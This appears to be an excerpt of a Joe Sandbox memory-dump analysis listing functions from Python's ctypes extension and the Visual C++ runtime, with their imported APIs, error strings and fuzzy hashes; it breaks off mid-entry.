Source File: 00000007.00000002.2088129467.00007FF8B93C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B93C0000, based on PE: true

Associated: 00000007.00000002.2088094009.00007FF8B93C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088170487.00007FF8B93D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088209313.00007FF8B93D7000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088245631.00007FF8B93DB000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8b93c0000_lib.jbxd

Similarity

API ID: Arg_AuditCallObject_ParseSys_Tuplememset
String ID: O&O!$ctypes.call_function
API String ID: 886791329-313584727
Opcode ID: 956f25cfe963604cb9d4e30e000f0088442d622793c0436951a4906829bed983
Instruction ID: c3b53d299b73e45bb74a4f77d5d2532bc8a8890221689e53b48c0dae80cab9a3
Opcode Fuzzy Hash: 956f25cfe963604cb9d4e30e000f0088442d622793c0436951a4906829bed983
Instruction Fuzzy Hash: 97015B76A18F8B82E7108F19E8947AA63A9FF4C7C4F402136EA4C06624DF3CE549CB00

Function 00007FF8B93CD9D4 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 33COMMON

Download Yara Rule

APIs

PyArg_ParseTuple.PYTHON311 ref: 00007FF8B93CDA03
PySys_Audit.PYTHON311 ref: 00007FF8B93CDA25

Part of subcall function 00007FF8B93C2980: memset.VCRUNTIME140 ref: 00007FF8B93C2A27
Part of subcall function 00007FF8B93C2980: PyObject_CallOneArg.PYTHON311 ref: 00007FF8B93C2A7E

Strings

ctypes.call_function, xrefs: 00007FF8B93CDA1E
O&O!, xrefs: 00007FF8B93CD9F8

Memory Dump Source

Source File: 00000007.00000002.2088129467.00007FF8B93C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B93C0000, based on PE: true

Associated: 00000007.00000002.2088094009.00007FF8B93C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088170487.00007FF8B93D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088209313.00007FF8B93D7000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088245631.00007FF8B93DB000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8b93c0000_lib.jbxd

Similarity

API ID: Arg_AuditCallObject_ParseSys_Tuplememset
String ID: O&O!$ctypes.call_function
API String ID: 886791329-313584727
Opcode ID: 17adec98670e9f6cdebf84fa662457cca95efbc4de64805adf32e68e07ce2538
Instruction ID: 96a4a54be0dd6afafe9e4dec6530bbbffbfcc353813e5930ab585faf60731d5c
Opcode Fuzzy Hash: 17adec98670e9f6cdebf84fa662457cca95efbc4de64805adf32e68e07ce2538
Instruction Fuzzy Hash: 44015B76A18B8BC2EB108F19E4547AA63A9FF4C7C4F402136EA4D03624DF3CE149CB10

Function 00007FF8B93C2F60 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 32COMMON

Download Yara Rule

APIs

PyErr_SetString.PYTHON311 ref: 00007FF8B93C7CC5
_Py_Dealloc.PYTHON311 ref: 00007FF8B93C7CDF

Strings

_type_ must be a type, xrefs: 00007FF8B93C2FA5
_type_ must have storage info, xrefs: 00007FF8B93C7CB4

Memory Dump Source

Source File: 00000007.00000002.2088129467.00007FF8B93C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B93C0000, based on PE: true

Associated: 00000007.00000002.2088094009.00007FF8B93C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088170487.00007FF8B93D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088209313.00007FF8B93D7000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088245631.00007FF8B93DB000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8b93c0000_lib.jbxd

Similarity

API ID: DeallocErr_String
String ID: _type_ must be a type$_type_ must have storage info
API String ID: 1259552197-214983684
Opcode ID: f9c93959e9af95d6c9b4c14054f54ac853c0c588ad50044a4a2a3fec31618313
Instruction ID: 8570ee1052b0b14adde19b31d0cdd1302e7b4cd5fb8e51d261aab397fcaf0a69
Opcode Fuzzy Hash: f9c93959e9af95d6c9b4c14054f54ac853c0c588ad50044a4a2a3fec31618313
Instruction Fuzzy Hash: B90112B5A09F8785EA559F5DD4901792274EF4EBD1F54A131DB1E523A0DF2CE4488301

Function 00007FF8B93CB1F8 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 30COMMON

Download Yara Rule

APIs

PyCallable_Check.PYTHON311 ref: 00007FF8B93CB210
PyErr_SetString.PYTHON311 ref: 00007FF8B93CB22B
_Py_Dealloc.PYTHON311 ref: 00007FF8B93CB252

Strings

the errcheck attribute must be callable, xrefs: 00007FF8B93CB221

Memory Dump Source

Source File: 00000007.00000002.2088129467.00007FF8B93C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B93C0000, based on PE: true

Associated: 00000007.00000002.2088094009.00007FF8B93C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088170487.00007FF8B93D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088209313.00007FF8B93D7000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088245631.00007FF8B93DB000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8b93c0000_lib.jbxd

Similarity

API ID: Callable_CheckDeallocErr_String
String ID: the errcheck attribute must be callable
API String ID: 3907376375-3049503998
Opcode ID: 40a5e4c9387a9eacadc56f8a50b5cb35d6fcf5bb7bd3e5eec0ef331718cf67ff
Instruction ID: fb09158defb6c5bf022805eb0ca6bd27ef0f1ab63d123b12c249111fd9f49f9d
Opcode Fuzzy Hash: 40a5e4c9387a9eacadc56f8a50b5cb35d6fcf5bb7bd3e5eec0ef331718cf67ff
Instruction Fuzzy Hash: BBF03121A08EC682EAA88F79F9541392374FF8DFD4F54A131CB5D46154DE2CD4998310

Function 00007FF8B93CE7AC Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 30COMMON

Download Yara Rule

APIs

PyErr_SetString.PYTHON311 ref: 00007FF8B93CE7E9

Strings

cannot be converted to pointer, xrefs: 00007FF8B93CE7DF

Memory Dump Source

Source File: 00000007.00000002.2088129467.00007FF8B93C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B93C0000, based on PE: true

Associated: 00000007.00000002.2088094009.00007FF8B93C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088170487.00007FF8B93D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088209313.00007FF8B93D7000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088245631.00007FF8B93DB000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8b93c0000_lib.jbxd

Similarity

API ID: Err_String
String ID: cannot be converted to pointer
API String ID: 1450464846-3065012988
Opcode ID: ba69f6be1e03f64db6319ffa1c479f40c92e1bf7f208d3a0c57e532b4c3c8d90
Instruction ID: b72adbc1a434efc0c2f3beb57425ef7ff114346a15e5df5b4c3e14c24b4a6817
Opcode Fuzzy Hash: ba69f6be1e03f64db6319ffa1c479f40c92e1bf7f208d3a0c57e532b4c3c8d90
Instruction Fuzzy Hash: 2201FB65A09B8A95EA648F29E89433923B5EF8DFC4F14A031DB4D07764DE3CE8988700

Function 00007FF8B9F62630 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 28COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF8B9F669C0: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF8B9F625CE), ref: 00007FF8B9F669CE

terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF8B9F6266E

Strings

MOC, xrefs: 00007FF8B9F62648
RCC, xrefs: 00007FF8B9F62640
csm, xrefs: 00007FF8B9F62650

Memory Dump Source

Source File: 00000007.00000002.2088453756.00007FF8B9F61000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF8B9F60000, based on PE: true

Associated: 00000007.00000002.2088414184.00007FF8B9F60000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000007.00000002.2088510059.00007FF8B9F71000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000007.00000002.2088589734.00007FF8B9F76000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000007.00000002.2088624293.00007FF8B9F77000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8b9f60000_lib.jbxd

Similarity

API ID: abortterminate
String ID: MOC$RCC$csm
API String ID: 661698970-2671469338
Opcode ID: e63037d86fd6ed08c01758bd2d278b6a49b1453d2f75febe4acf0c3d16fc865e
Instruction ID: c07a4af1920bb21b3e4b0952f264b371a07aaec64f1e857545359f02fd74057a
Opcode Fuzzy Hash: e63037d86fd6ed08c01758bd2d278b6a49b1453d2f75febe4acf0c3d16fc865e
Instruction Fuzzy Hash: C4F06232918787C1E7505FA9E1810AC3A74FF49BEAF09A171DB4846356CF3DD4A4CB41

Function 00007FF8B93C9A20 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 26COMMON

Download Yara Rule

APIs

PyErr_SetString.PYTHON311 ref: 00007FF8B93C9A4E
PyLong_AsVoidPtr.PYTHON311 ref: 00007FF8B93C9A5B
PyErr_Occurred.PYTHON311 ref: 00007FF8B93C9A64

Strings

integer expected, xrefs: 00007FF8B93C9A44

Memory Dump Source

Source File: 00000007.00000002.2088129467.00007FF8B93C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B93C0000, based on PE: true

Associated: 00000007.00000002.2088094009.00007FF8B93C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088170487.00007FF8B93D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088209313.00007FF8B93D7000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088245631.00007FF8B93DB000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8b93c0000_lib.jbxd

Similarity

API ID: Err_$Long_OccurredStringVoid
String ID: integer expected
API String ID: 1621529885-2140524511
Opcode ID: 7b49f154c6c6e067b1201768131b658a8a7bf5851dad34e5bb971b0d47541ff1
Instruction ID: bb44d136da7018642fad2ebbd4188433cfba938edb6e8f327f90dcf2fd0fe321
Opcode Fuzzy Hash: 7b49f154c6c6e067b1201768131b658a8a7bf5851dad34e5bb971b0d47541ff1
Instruction Fuzzy Hash: 14F01D29B08B8686EB549F59E5A423A6374EF4DFD0F05B030DB0E47355DE2CD4988700

Function 00007FF8B93C8162 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 12COMMON

Download Yara Rule

APIs

_Py_Dealloc.PYTHON311 ref: 00007FF8B93C8165
PyMem_Free.PYTHON311 ref: 00007FF8B93C816E
PyErr_Format.PYTHON311 ref: 00007FF8B93C8188

Strings

second item in _fields_ tuple (index %zd) must be a C type, xrefs: 00007FF8B93C817E

Memory Dump Source

Source File: 00000007.00000002.2088129467.00007FF8B93C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B93C0000, based on PE: true

Associated: 00000007.00000002.2088094009.00007FF8B93C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088170487.00007FF8B93D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088209313.00007FF8B93D7000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088245631.00007FF8B93DB000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8b93c0000_lib.jbxd

Similarity

API ID: DeallocErr_FormatFreeMem_
String ID: second item in _fields_ tuple (index %zd) must be a C type
API String ID: 3237669406-2717732800
Opcode ID: 6c5e0c61733740b2a0fd8058cc8b9152b4a417e0ab55625c6ded04eac5423bae
Instruction ID: 30703729edae99e53a88fd135bd6dd9b31ef9ec27e16a909be231ddda061c656
Opcode Fuzzy Hash: 6c5e0c61733740b2a0fd8058cc8b9152b4a417e0ab55625c6ded04eac5423bae
Instruction Fuzzy Hash: A3E04C64A0DAC783EA649F6D98640382324EF8BFE5B502231DA1F526B0CE3CA54D9305

Function 00007FF8B9F6A814 Relevance: 6.1, APIs: 4, Instructions: 133COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::DName.LIBVCRUNTIME ref: 00007FF8B9F6A8C6
DName::operator+.LIBVCRUNTIME ref: 00007FF8B9F6A8D6
DName::operator+.LIBVCRUNTIME ref: 00007FF8B9F6A8F3

Memory Dump Source

Source File: 00000007.00000002.2088453756.00007FF8B9F61000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF8B9F60000, based on PE: true

Associated: 00000007.00000002.2088414184.00007FF8B9F60000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000007.00000002.2088510059.00007FF8B9F71000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000007.00000002.2088589734.00007FF8B9F76000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000007.00000002.2088624293.00007FF8B9F77000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8b9f60000_lib.jbxd

Similarity

API ID: Name::operator+$NameName::
String ID:
API String ID: 168861036-0
Opcode ID: 98efd56155e24b1ceec94087ea0ccb087ffd731ce7e45ec66b02000ff67e82c1
Instruction ID: eecb87b0a9a861f1eb7d7de2050b45b27f6715aed0846886ceb40a9bb2836c3c
Opcode Fuzzy Hash: 98efd56155e24b1ceec94087ea0ccb087ffd731ce7e45ec66b02000ff67e82c1
Instruction Fuzzy Hash: 5F516C72A18B9689FB118F68D8417BC37A1BB45BAAF656031DB0E07795DF3DE440C710

Function 00007FF8B93CB42C Relevance: 6.1, APIs: 4, Instructions: 57COMMON

Download Yara Rule

APIs

PyMem_Malloc.PYTHON311 ref: 00007FF8B93CB448
memcpy.VCRUNTIME140 ref: 00007FF8B93CB461
PyMem_Free.PYTHON311 ref: 00007FF8B93CB480
_Py_Dealloc.PYTHON311 ref: 00007FF8B93CB4B7

Memory Dump Source

Source File: 00000007.00000002.2088129467.00007FF8B93C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B93C0000, based on PE: true

Associated: 00000007.00000002.2088094009.00007FF8B93C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088170487.00007FF8B93D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088209313.00007FF8B93D7000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088245631.00007FF8B93DB000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8b93c0000_lib.jbxd

Similarity

API ID: Mem_$DeallocFreeMallocmemcpy
String ID:
API String ID: 1346496523-0
Opcode ID: 8c08fdf6c3f6743b583b35e04fc598e2fc29906b9b2b5698a8cb90300fdd1926
Instruction ID: 788894b177ef7a1eba62427cdc434e99b47d613230dc8b59eed69e790c44915c
Opcode Fuzzy Hash: 8c08fdf6c3f6743b583b35e04fc598e2fc29906b9b2b5698a8cb90300fdd1926
Instruction Fuzzy Hash: 15210462A09F8282EA689F29A95013A22B4FF4CFD4B046535DB4D47754EF3CE8A5C340

Function 00007FF8B93C49BC Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

PyDescr_NewGetSet.PYTHON311 ref: 00007FF8B93C49E9
PyDict_SetItemString.PYTHON311 ref: 00007FF8B93C4A00
_Py_Dealloc.PYTHON311 ref: 00007FF8B93C907F
_Py_Dealloc.PYTHON311 ref: 00007FF8B93C9097

Memory Dump Source

Source File: 00000007.00000002.2088129467.00007FF8B93C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B93C0000, based on PE: true

Associated: 00000007.00000002.2088094009.00007FF8B93C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088170487.00007FF8B93D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088209313.00007FF8B93D7000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088245631.00007FF8B93DB000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8b93c0000_lib.jbxd

Similarity

API ID: Dealloc$Descr_Dict_ItemString
String ID:
API String ID: 975051370-0
Opcode ID: cbfa8e76cbb37faade4b4752a761ba53e7deef88f0e4638b9d9c9114bc06fd37
Instruction ID: bea27afa9373d25e78f34bf7c2bb5b3239ad2e850b5e3a10876aadad3f0a8118
Opcode Fuzzy Hash: cbfa8e76cbb37faade4b4752a761ba53e7deef88f0e4638b9d9c9114bc06fd37
Instruction Fuzzy Hash: A3114F25A0DF8685EAA48F1AA95433A6274EF4EFD0F086130DF4E43755DF3CE4558305

Function 00007FF8B93C15F4 Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF8B93C22B0: _PyObject_MakeTpCall.PYTHON311 ref: 00007FF8B93C2301

PyWeakref_NewProxy.PYTHON311(?,?,00000000,00007FF8B93C156A), ref: 00007FF8B93C163E
PyDict_SetItem.PYTHON311(?,?,00000000,00007FF8B93C156A), ref: 00007FF8B93C165F
_Py_Dealloc.PYTHON311(?,?,00000000,00007FF8B93C156A), ref: 00007FF8B93C6A71
_Py_Dealloc.PYTHON311(?,?,00000000,00007FF8B93C156A), ref: 00007FF8B93C6A80

Memory Dump Source

Source File: 00000007.00000002.2088129467.00007FF8B93C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B93C0000, based on PE: true

Associated: 00000007.00000002.2088094009.00007FF8B93C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088170487.00007FF8B93D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088209313.00007FF8B93D7000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088245631.00007FF8B93DB000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8b93c0000_lib.jbxd

Similarity

API ID: Dealloc$CallDict_ItemMakeObject_ProxyWeakref_
String ID:
API String ID: 1512266493-0
Opcode ID: edfa2a0c717579e9911386e870fa1321e468c4d2dd0d8facd930d0c933b2ac38
Instruction ID: 41be39a208615152380a94ee735dd847eacd4d14ab77ee6e86406d535379a034
Opcode Fuzzy Hash: edfa2a0c717579e9911386e870fa1321e468c4d2dd0d8facd930d0c933b2ac38
Instruction Fuzzy Hash: 9C114F22A09FC285EA545F29A85007A63B8FF4EFD0B1CA131EF5E07795CE3CE5658340

Function 00007FF8B93CC458 Relevance: 6.0, APIs: 4, Instructions: 32COMMON

Download Yara Rule

APIs

PyObject_GC_UnTrack.PYTHON311 ref: 00007FF8B93CC461
_Py_Dealloc.PYTHON311 ref: 00007FF8B93CC476
_Py_Dealloc.PYTHON311 ref: 00007FF8B93CC48B
_Py_Dealloc.PYTHON311 ref: 00007FF8B93CC4A0

Memory Dump Source

Source File: 00000007.00000002.2088129467.00007FF8B93C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B93C0000, based on PE: true

Associated: 00000007.00000002.2088094009.00007FF8B93C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088170487.00007FF8B93D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088209313.00007FF8B93D7000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088245631.00007FF8B93DB000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8b93c0000_lib.jbxd

Similarity

API ID: Dealloc$Object_Track
String ID:
API String ID: 887704541-0
Opcode ID: 3d42f6f96641afa8e40a9b95133215a649903610cae807ab0b9964238f53290f
Instruction ID: 94b8384101fef544708e5a2317faa25e0947806889492f02e1da56d60489881a
Opcode Fuzzy Hash: 3d42f6f96641afa8e40a9b95133215a649903610cae807ab0b9964238f53290f
Instruction Fuzzy Hash: 0D01FF35E0AF86D0FEAA8F79986453A2378EF8EFA5F186530CB4D42650CF2DE4458340

Function 00007FF8B93CC8D4 Relevance: 6.0, APIs: 4, Instructions: 28COMMON

Download Yara Rule

APIs

Py_IsInitialized.PYTHON311 ref: 00007FF8B93CC8F1
Py_Initialize.PYTHON311 ref: 00007FF8B93CC8FB
PyGILState_Ensure.PYTHON311 ref: 00007FF8B93CC901
PyGILState_Release.PYTHON311 ref: 00007FF8B93CC91B

Memory Dump Source

Source File: 00000007.00000002.2088129467.00007FF8B93C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B93C0000, based on PE: true

Associated: 00000007.00000002.2088094009.00007FF8B93C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088170487.00007FF8B93D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088209313.00007FF8B93D7000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088245631.00007FF8B93DB000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8b93c0000_lib.jbxd

Similarity

API ID: State_$EnsureInitializeInitializedRelease
String ID:
API String ID: 2621580956-0
Opcode ID: 228736a826a5a1ff67be1b297f58c8bae0a48c2954096bea5476443be523e544
Instruction ID: 11373ba39eb6cb8b2b0d440be810b03dc53651a71979fe1d79075fea44cb1506
Opcode Fuzzy Hash: 228736a826a5a1ff67be1b297f58c8bae0a48c2954096bea5476443be523e544
Instruction Fuzzy Hash: F2F03A21B08BC182EB509F6AB85446AA274FF9DFC0F586434EB4983716DE3CD8958B00

Function 00007FF8B9F649B0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF8B9F669C0: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF8B9F625CE), ref: 00007FF8B9F669CE

_CreateFrameInfo.LIBVCRUNTIME ref: 00007FF8B9F64A86
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF8B9F64AE4

Strings

csm, xrefs: 00007FF8B9F64B8A

Memory Dump Source

Source File: 00000007.00000002.2088453756.00007FF8B9F61000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF8B9F60000, based on PE: true

Associated: 00000007.00000002.2088414184.00007FF8B9F60000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000007.00000002.2088510059.00007FF8B9F71000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000007.00000002.2088589734.00007FF8B9F76000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000007.00000002.2088624293.00007FF8B9F77000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8b9f60000_lib.jbxd

Similarity

API ID: abort$CreateFrameInfo
String ID: csm
API String ID: 2697087660-1018135373
Opcode ID: 5e4671b1cbff3658d511699c3cf653202505efa909c7ec854f7fa1af4338784c
Instruction ID: a0536901a393f4a74ef010bfcbaf808635bb26e1559b0e9eb24cf150a92019e9
Opcode Fuzzy Hash: 5e4671b1cbff3658d511699c3cf653202505efa909c7ec854f7fa1af4338784c
Instruction Fuzzy Hash: 1E512872A1878186E720AF1AE04026E77B4FB89BE2F102539DF8D47B55DF38E464CB40

Function 00007FF8B9F69F44 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 68COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::operator+.LIBVCRUNTIME ref: 00007FF8B9F6A042

Strings

void , xrefs: 00007FF8B9F69FCC
void, xrefs: 00007FF8B9F69FA4

Memory Dump Source

Source File: 00000007.00000002.2088453756.00007FF8B9F61000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF8B9F60000, based on PE: true

Associated: 00000007.00000002.2088414184.00007FF8B9F60000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000007.00000002.2088510059.00007FF8B9F71000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000007.00000002.2088589734.00007FF8B9F76000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000007.00000002.2088624293.00007FF8B9F77000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8b9f60000_lib.jbxd

Similarity

API ID: Name::operator+
String ID: void$void
API String ID: 2943138195-3746155364
Opcode ID: 7dcf970a61f58172c3a4f39e178d28c376ed2dbead67cac1058dce2bd18ce07b
Instruction ID: f2b821ff7fbe8bd1475b0310c9452fb0714e28b1ba36097a8efd452293eebcc9
Opcode Fuzzy Hash: 7dcf970a61f58172c3a4f39e178d28c376ed2dbead67cac1058dce2bd18ce07b
Instruction Fuzzy Hash: 6831F662E18B9998FB01CFA8E8410FC37B0FB48799B445536EB4E56B59DF3C9144C750

Function 00007FF8B93C2DC0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON

Download Yara Rule

APIs

PyErr_SetString.PYTHON311(?,?,?,00007FF8B93C6C1D), ref: 00007FF8B93C7B85
_Py_Dealloc.PYTHON311 ref: 00007FF8B93C7B9E

Strings

abstract class, xrefs: 00007FF8B93C7B7B

Memory Dump Source

Source File: 00000007.00000002.2088129467.00007FF8B93C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B93C0000, based on PE: true

Associated: 00000007.00000002.2088094009.00007FF8B93C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088170487.00007FF8B93D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088209313.00007FF8B93D7000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088245631.00007FF8B93DB000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8b93c0000_lib.jbxd

Similarity

API ID: DeallocErr_String
String ID: abstract class
API String ID: 1259552197-1623945838
Opcode ID: 889cc83bd7e42d210c141f1a36b7b4f58b9fb1ebab554f935c723b1e3cc6fbc7
Instruction ID: b1030e7522d5138085fc03bad9295d96dfe5ec7beae5b7ce0abf841a09be8927
Opcode Fuzzy Hash: 889cc83bd7e42d210c141f1a36b7b4f58b9fb1ebab554f935c723b1e3cc6fbc7
Instruction Fuzzy Hash: 0B113022A09F8682EA649F2DA49477A63B4EF8EBD1F146134CB0E56391DF3CE4488300

Function 00007FF8B93CEDAC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON

Download Yara Rule

APIs

PyLong_AsLong.PYTHON311 ref: 00007FF8B93CEE1B
PyErr_Format.PYTHON311 ref: 00007FF8B93CEE3D

Strings

one character bytes, bytearray or integer expected, xrefs: 00007FF8B93CEE33

Memory Dump Source

Source File: 00000007.00000002.2088129467.00007FF8B93C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B93C0000, based on PE: true

Associated: 00000007.00000002.2088094009.00007FF8B93C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088170487.00007FF8B93D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088209313.00007FF8B93D7000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088245631.00007FF8B93DB000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8b93c0000_lib.jbxd

Similarity

API ID: Err_FormatLongLong_
String ID: one character bytes, bytearray or integer expected
API String ID: 832222675-2748977362
Opcode ID: 4171aea13ba1fa0aee4d8e851ffe7b5e382af772fa60775af7b968a914772540
Instruction ID: be572131cea00c3babb5594d822a48ffa16e6b8e297549a5a95dad373edeead9
Opcode Fuzzy Hash: 4171aea13ba1fa0aee4d8e851ffe7b5e382af772fa60775af7b968a914772540
Instruction Fuzzy Hash: A0111C62A08BC685EB658F2DD45417A2BB4EF4EFC4F186031DB4D47255CE2CE8A8C301

Function 00007FF8B93CA15C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 41COMMON

Download Yara Rule

APIs

PyErr_SetString.PYTHON311 ref: 00007FF8B93CA185

Part of subcall function 00007FF8B93CAA7C: PyErr_SetString.PYTHON311(?,?,?,?,00007FF8B93C947D,?), ref: 00007FF8B93CAABD

Strings

NULL pointer access, xrefs: 00007FF8B93CA1A3
Pointer does not support item deletion, xrefs: 00007FF8B93CA17B

Memory Dump Source

